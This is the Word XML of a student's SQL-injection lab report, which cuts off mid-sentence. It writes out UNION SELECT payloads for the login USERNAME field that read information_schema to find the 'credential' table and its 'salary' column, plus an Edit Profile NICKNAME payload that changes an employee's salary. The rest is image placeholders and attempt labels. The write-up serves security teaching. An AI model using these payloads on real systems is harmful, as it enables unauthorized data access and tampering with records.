    <w:p w14:paraId="2CADF385" w14:textId="77777777" w:rsidR="002D574A" w:rsidRDefault="002D574A" w:rsidP="002D574A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="115F6CAB" w14:textId="2A0FC3CB" w:rsidR="002D574A" w:rsidRDefault="002D574A" w:rsidP="002D574A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Attempt 2:</w:t>
      </w:r>
      <w:r w:rsidR="001B3313">
        <w:t xml:space="preserve"> (fail)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5623180A" w14:textId="22C03480" w:rsidR="002D574A" w:rsidRDefault="002D574A" w:rsidP="002D574A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78789E81" wp14:editId="32FC9FC4">
            <wp:extent cx="2456597" cy="3199266"/>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7418" cy="3226381"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2470AB11" w14:textId="17BF9602" w:rsidR="002D574A" w:rsidRDefault="005D66B9" w:rsidP="00F06CD0">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Attempt 3:</w:t>
      </w:r>
      <w:r w:rsidR="001B3313">
        <w:t xml:space="preserve"> (fail)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0619E881" w14:textId="2BE88E1C" w:rsidR="005D66B9" w:rsidRDefault="00371861" w:rsidP="00F06CD0">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="785B8922" wp14:editId="2691369B">
            <wp:extent cx="2477069" cy="37175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8418" cy="3719611"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D5B4CF" w14:textId="0C86613D" w:rsidR="00371861" w:rsidRDefault="00371861" w:rsidP="001B3313"/>
    <w:p w14:paraId="1A4D1430" w14:textId="669DE0D4" w:rsidR="00371861" w:rsidRDefault="00371861" w:rsidP="00F06CD0">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Attempt 4</w:t>
      </w:r>
      <w:r w:rsidR="001B3313">
        <w:t>: (fail)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB371A4" w14:textId="24635028" w:rsidR="00371861" w:rsidRDefault="009118AF" w:rsidP="00F06CD0">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="383645D6" wp14:editId="166E669D">
            <wp:extent cx="2381534" cy="3785757"/>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2381" cy="3818896"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1106CE13" w14:textId="588F544E" w:rsidR="009118AF" w:rsidRDefault="009118AF" w:rsidP="00F06CD0">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Attempt 5:</w:t>
      </w:r>
      <w:r w:rsidR="003A0FEB">
        <w:t xml:space="preserve"> (success!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D3C942" w14:textId="3844EBD9" w:rsidR="009118AF" w:rsidRPr="008933A0" w:rsidRDefault="002A1180" w:rsidP="00F06CD0">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0508555D" wp14:editId="402651E2">
            <wp:extent cx="2422478" cy="35865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2530" cy="3601395"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BDAE8D" w14:textId="11B24CF2" w:rsidR="00B96B17" w:rsidRDefault="00361EAB" w:rsidP="00361EAB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Q 4.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D1EC49" w14:textId="42DC3A49" w:rsidR="00BB1694" w:rsidRDefault="00BB1694" w:rsidP="00BB1694">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The exact contents filled into each field.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F8272B" w14:textId="00A6BD81" w:rsidR="00E60C11" w:rsidRDefault="00E60C11" w:rsidP="00BB1694">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">First, get the table name </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">credential </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">by performing an attack on the login page. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C0B610" w14:textId="57154021" w:rsidR="00E60C11" w:rsidRDefault="00E60C11" w:rsidP="00E60C11">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="654A1FCB" w14:textId="1003ADF4" w:rsidR="00E60C11" w:rsidRDefault="00E60C11" w:rsidP="00E60C11">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">USERNAME: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>‘ UNION</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> SELECT 0, TABLE_NAME, 0, 0, 0, 0, 0, 0, 0, 0, 0 FROM information_schema.COLUMNS WHERE COLUMN_NAME = ‘Nickname’ #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78351B04" w14:textId="285A5D31" w:rsidR="00142636" w:rsidRDefault="00142636" w:rsidP="00E60C11">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DB5FAA4" w14:textId="11C25F3D" w:rsidR="00142636" w:rsidRDefault="00142636" w:rsidP="00E60C11">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t>PASSWORD:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A42F749" w14:textId="4F23D267" w:rsidR="00142636" w:rsidRDefault="00142636" w:rsidP="00142636">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The PASSWORD field is empty.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4B955B" w14:textId="77777777" w:rsidR="00D52620" w:rsidRDefault="00D52620" w:rsidP="00D52620">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1800"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15B4E37B" w14:textId="62ACA72C" w:rsidR="00BB1694" w:rsidRDefault="00E60C11" w:rsidP="00BB1694">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Second</w:t>
      </w:r>
      <w:r w:rsidR="00BB1694">
        <w:t xml:space="preserve">, get the schema of the table </w:t>
      </w:r>
      <w:r w:rsidR="00BB1694">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">credential </w:t>
      </w:r>
      <w:r w:rsidR="00BB1694">
        <w:t xml:space="preserve">since we do not know that salaries are stored in a column called </w:t>
      </w:r>
      <w:r w:rsidR="00BB1694">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>salary</w:t>
      </w:r>
      <w:r w:rsidR="00BB1694">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00E433B9">
        <w:t xml:space="preserve"> Using the same trick as in Q3.7, first perform an attack on the login page. Again, trial-and-error is used for finding the column name of interest, i.e., salary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CC5F5B" w14:textId="481C3A53" w:rsidR="00E433B9" w:rsidRDefault="00E433B9" w:rsidP="00E433B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DF670AB" w14:textId="4A4D5F43" w:rsidR="00E433B9" w:rsidRDefault="00E433B9" w:rsidP="00E433B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">USERNAME: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>‘ UNION</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> SELECT 0, COLUMN_NAME, 0, 0, 0, 0, 0, 0, 0, 0, 0 FROM information_schema.COLUMNS WHERE TABLE_NAME = ‘credential’ LIMIT 3, 1 #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F36FBC" w14:textId="77777777" w:rsidR="00E433B9" w:rsidRDefault="00E433B9" w:rsidP="00E433B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56EE584B" w14:textId="45DA7ABB" w:rsidR="00BB1694" w:rsidRDefault="00CE4296" w:rsidP="00BB1694">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t>PASSWORD:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A32C60" w14:textId="6AAD9906" w:rsidR="00CE4296" w:rsidRDefault="00CE4296" w:rsidP="00CE4296">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The PASSWORD field is empty.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D47AA3" w14:textId="77777777" w:rsidR="00D52620" w:rsidRDefault="00D52620" w:rsidP="00D52620">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1800"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C38D32B" w14:textId="6C5B059E" w:rsidR="005431EC" w:rsidRDefault="005431EC" w:rsidP="005431EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Next, using the column name </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">salary </w:t>
      </w:r>
      <w:r>
        <w:t>obtained in part a, perform another SQL injection attack on the ‘Edit Profile’ page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF376A8" w14:textId="691BF966" w:rsidR="005431EC" w:rsidRDefault="005431EC" w:rsidP="005431EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="713BAD52" w14:textId="12717192" w:rsidR="005431EC" w:rsidRDefault="00F02838" w:rsidP="005431EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t>NICKNAME</w:t>
      </w:r>
      <w:r w:rsidR="005431EC">
        <w:t>: ‘, salary = ‘90000’ WHERE EID = ‘10000’ #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251EA3EA" w14:textId="77777777" w:rsidR="00D52620" w:rsidRDefault="00D52620" w:rsidP="005431EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EAB8AE1" w14:textId="3650FA7C" w:rsidR="005431EC" w:rsidRDefault="00F02838" w:rsidP="00F02838">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">All other fields are </w:t>
      </w:r>
      <w:r w:rsidR="005431EC">
        <w:t>empty.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C8466C" w14:textId="05C2019F" w:rsidR="004A3C85" w:rsidRDefault="004A3C85" w:rsidP="004A3C85"/>
    <w:p w14:paraId="7EC4EE46" w14:textId="63F5F880" w:rsidR="00D52620" w:rsidRDefault="00D52620" w:rsidP="004A3C85"/>
    <w:p w14:paraId="6E4B371D" w14:textId="568E53F6" w:rsidR="00D52620" w:rsidRDefault="00D52620" w:rsidP="004A3C85"/>
    <w:p w14:paraId="2D37EB18" w14:textId="5542D2AE" w:rsidR="00D52620" w:rsidRDefault="00D52620" w:rsidP="004A3C85"/>
    <w:p w14:paraId="7F994AAD" w14:textId="36D2DD83" w:rsidR="00D52620" w:rsidRDefault="00D52620" w:rsidP="004A3C85"/>
    <w:p w14:paraId="5288BE6F" w14:textId="62FE8BFA" w:rsidR="00D52620" w:rsidRDefault="00D52620" w:rsidP="004A3C85"/>
    <w:p w14:paraId="5A4CE5FD" w14:textId="531FF187" w:rsidR="00D52620" w:rsidRDefault="00D52620" w:rsidP="004A3C85"/>
    <w:p w14:paraId="0B81A0FD" w14:textId="0709AE54" w:rsidR="00D52620" w:rsidRDefault="00D52620" w:rsidP="004A3C85"/>
    <w:p w14:paraId="19718AA2" w14:textId="33E03295" w:rsidR="00D52620" w:rsidRDefault="00D52620" w:rsidP="004A3C85"/>
    <w:p w14:paraId="3B014DC7" w14:textId="3C11A85B" w:rsidR="00D52620" w:rsidRDefault="00D52620" w:rsidP="004A3C85"/>
    <w:p w14:paraId="0C747577" w14:textId="77777777" w:rsidR="00D52620" w:rsidRDefault="00D52620" w:rsidP="004A3C85"/>
    <w:p w14:paraId="251DB273" w14:textId="0990912A" w:rsidR="00E20E70" w:rsidRDefault="004A3C85" w:rsidP="00E20E70">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Screenshots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B30F7A" w14:textId="2F33D595" w:rsidR="004A3C85" w:rsidRDefault="00A12932" w:rsidP="004A3C85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Alice’s profile before the attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729576B0" w14:textId="0A1DA990" w:rsidR="00A12932" w:rsidRDefault="00A12932" w:rsidP="004A3C85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CF2EF43" wp14:editId="269221B5">
            <wp:extent cx="2422478" cy="34940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6681" cy="3543344"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFEC0B8" w14:textId="7E3430A7" w:rsidR="00E20E70" w:rsidRDefault="00E20E70" w:rsidP="004A3C85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07EDC18F" w14:textId="77777777" w:rsidR="00E20E70" w:rsidRDefault="00E20E70" w:rsidP="00E20E70">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Attack in step a:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47274DA3" w14:textId="77777777" w:rsidR="00E20E70" w:rsidRDefault="00E20E70" w:rsidP="00E20E70">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49DA3304" wp14:editId="52E40142">
            <wp:extent cx="2343021" cy="3889611"/>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3774" cy="3940663"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6566F641" w14:textId="4966D387" w:rsidR="00A12932" w:rsidRDefault="00A12932" w:rsidP="004A3C85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Trial-and-error</w:t>
      </w:r>
      <w:r w:rsidR="00707741">
        <w:t xml:space="preserve"> in step </w:t>
      </w:r>
      <w:r w:rsidR="00E20E70">
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidR="00707741">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D09801" w14:textId="2100DA02" w:rsidR="00A12932" w:rsidRDefault="00A12932" w:rsidP="00A12932">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Attempt 1</w:t>
      </w:r>
      <w:r w:rsidR="00583244">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00894D1B">
        <w:t xml:space="preserve"> (fail)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FC87AA" w14:textId="2B1F586E" w:rsidR="00A12932" w:rsidRDefault="00A12932" w:rsidP="00974912">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18A7E8AA" wp14:editId="2AD4AC4C">
            <wp:extent cx="2463421" cy="3701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0106" cy="3741561"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E551CD9" w14:textId="5FAA939F" w:rsidR="00A12932" w:rsidRDefault="00A12932" w:rsidP="00A12932">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Attempt 2</w:t>
      </w:r>
      <w:r w:rsidR="00583244">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00894D1B">
        <w:t xml:space="preserve"> (fail)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243E173E" w14:textId="0A3CEF24" w:rsidR="00A12932" w:rsidRDefault="002E5EBC" w:rsidP="00A12932">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23D93673" wp14:editId="7AF19641">
            <wp:extent cx="2511188" cy="3714669"/>
            <wp:effectExtent l="0" t="0" r="381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5490" cy="3735826"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAEE003" w14:textId="77777777" w:rsidR="00974912" w:rsidRDefault="00974912" w:rsidP="00A12932">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BBD2115" w14:textId="4AAE2EE8" w:rsidR="00BA55A7" w:rsidRDefault="00BA55A7" w:rsidP="005E428B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Attempt 3:</w:t>
      </w:r>
      <w:r w:rsidR="00894D1B">
        <w:t xml:space="preserve"> (success!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393F7113" w14:textId="0ACEC960" w:rsidR="00BB0C1D" w:rsidRDefault="00BB0C1D" w:rsidP="00C059E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="660C887F" wp14:editId="67AEC9C7">
            <wp:extent cx="2490470" cy="3789266"/>
            <wp:effectExtent l="0" t="0" r="508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3610" cy="3839689"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1028D7" w14:textId="77777777" w:rsidR="00706AEE" w:rsidRDefault="00706AEE" w:rsidP="00C059E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0178096C" w14:textId="22695097" w:rsidR="00BB0C1D" w:rsidRDefault="00BB0C1D" w:rsidP="00A12932">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HTTP GET request </w:t>
      </w:r>
      <w:r w:rsidR="00E22BF5">
        <w:t>when</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> performing the attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEC820C" w14:textId="7FF24C97" w:rsidR="005E428B" w:rsidRDefault="00BB0C1D" w:rsidP="00C059E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EE445A8" wp14:editId="12C14EE1">
            <wp:extent cx="5943600" cy="834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834390"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7146A7" w14:textId="77777777" w:rsidR="00C059E9" w:rsidRDefault="00C059E9" w:rsidP="00C059E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0453ECDC" w14:textId="77777777" w:rsidR="00706AEE" w:rsidRDefault="00706AEE" w:rsidP="005E428B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33D34798" w14:textId="77777777" w:rsidR="00706AEE" w:rsidRDefault="00706AEE" w:rsidP="005E428B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65F7EFD6" w14:textId="77777777" w:rsidR="00706AEE" w:rsidRDefault="00706AEE" w:rsidP="005E428B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12DB7BA3" w14:textId="77777777" w:rsidR="00706AEE" w:rsidRDefault="00706AEE" w:rsidP="005E428B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AC265BB" w14:textId="77777777" w:rsidR="00706AEE" w:rsidRDefault="00706AEE" w:rsidP="005E428B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66DACC74" w14:textId="77777777" w:rsidR="00706AEE" w:rsidRDefault="00706AEE" w:rsidP="005E428B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71757CEC" w14:textId="77777777" w:rsidR="00706AEE" w:rsidRDefault="00706AEE" w:rsidP="005E428B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B0B1F98" w14:textId="77777777" w:rsidR="00706AEE" w:rsidRDefault="00706AEE" w:rsidP="005E428B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35EEE978" w14:textId="77777777" w:rsidR="00706AEE" w:rsidRDefault="00706AEE" w:rsidP="005E428B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D6D6F6C" w14:textId="74C7F42A" w:rsidR="005E428B" w:rsidRDefault="005E428B" w:rsidP="005E428B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Alice’s profile after the attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4D0537" w14:textId="20C5D02C" w:rsidR="005E428B" w:rsidRDefault="005E428B" w:rsidP="005E428B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D839C4E" wp14:editId="368ED673">
            <wp:extent cx="2575076" cy="37394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307" cy="3761605"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="56708B92" w14:textId="1D6E24D9" w:rsidR="005E428B" w:rsidRDefault="005E428B" w:rsidP="005E428B"/>
    <w:p w14:paraId="25886290" w14:textId="1B251FAD" w:rsidR="005E428B" w:rsidRDefault="005E428B" w:rsidP="005E428B">
      <w:r>
        <w:t>Observations: I first performed an SQL injection attack</w:t>
      </w:r>
      <w:r w:rsidR="00C13D17">
        <w:t xml:space="preserve"> on the login page</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009A7586">
        <w:t>to obtain the table name (</w:t>
      </w:r>
      <w:r w:rsidR="009A7586">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>credential</w:t>
      </w:r>
      <w:r w:rsidR="009A7586">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="009A7586">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009A7586">
        <w:t xml:space="preserve">of interest by stealing the information from the system table </w:t>
      </w:r>
      <w:r w:rsidR="009A7586">
        <w:rPr>
          <w:i/>
          <w:iCs/>
